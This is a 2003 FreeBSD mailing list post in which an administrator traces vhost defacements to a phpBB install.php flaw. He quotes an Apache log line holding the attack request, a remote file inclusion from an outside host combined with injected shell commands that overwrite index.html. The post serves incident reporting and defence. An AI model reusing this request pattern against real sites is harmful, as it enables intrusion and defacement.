hack ? - urgent - false FreeBSD alarm
Miha Nedok
mike at voyager.unix-systems.net
Fri Nov 7 04:28:53 PST 2003
Hi !
It is phpBB related. I found in logs:
200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET
/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site-
name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex at hotmail.com%20>%20index.html
HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
I just did chmod 000 `find -name 'install.php'` for a workaround.
Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 .
-Miha
On Fri, 7 Nov 2003, Marco Trentini wrote:
> Date: Fri, 07 Nov 2003 13:08:26 +0100
> From: Marco Trentini <mark at remotelab.org>
> To: Miha Nedok <mike at voyager.unix-systems.net>
> Cc: security at freebsd.org, stable at freebsd.org
> Subject: Re: hack ? - urgent
>
> Miha Nedok wrote:
> > Hi !
> >
> > Today I have noticed some modified index.html files on some of our vhosts.
> > Is it Apache related ? Does anyone know about this ?
> >
> > The content is following:
> > IR4DEX ownz you FreeBSD - contato: ir4dex at hotmail.com
>
> Is your apache version update?
>
> Maybe IR4DEX knows more about it :)
>
> --
> Marco Trentini mark at remotelab.org
> http://www.remotelab.org/
>
More information about the freebsd-stable
mailing list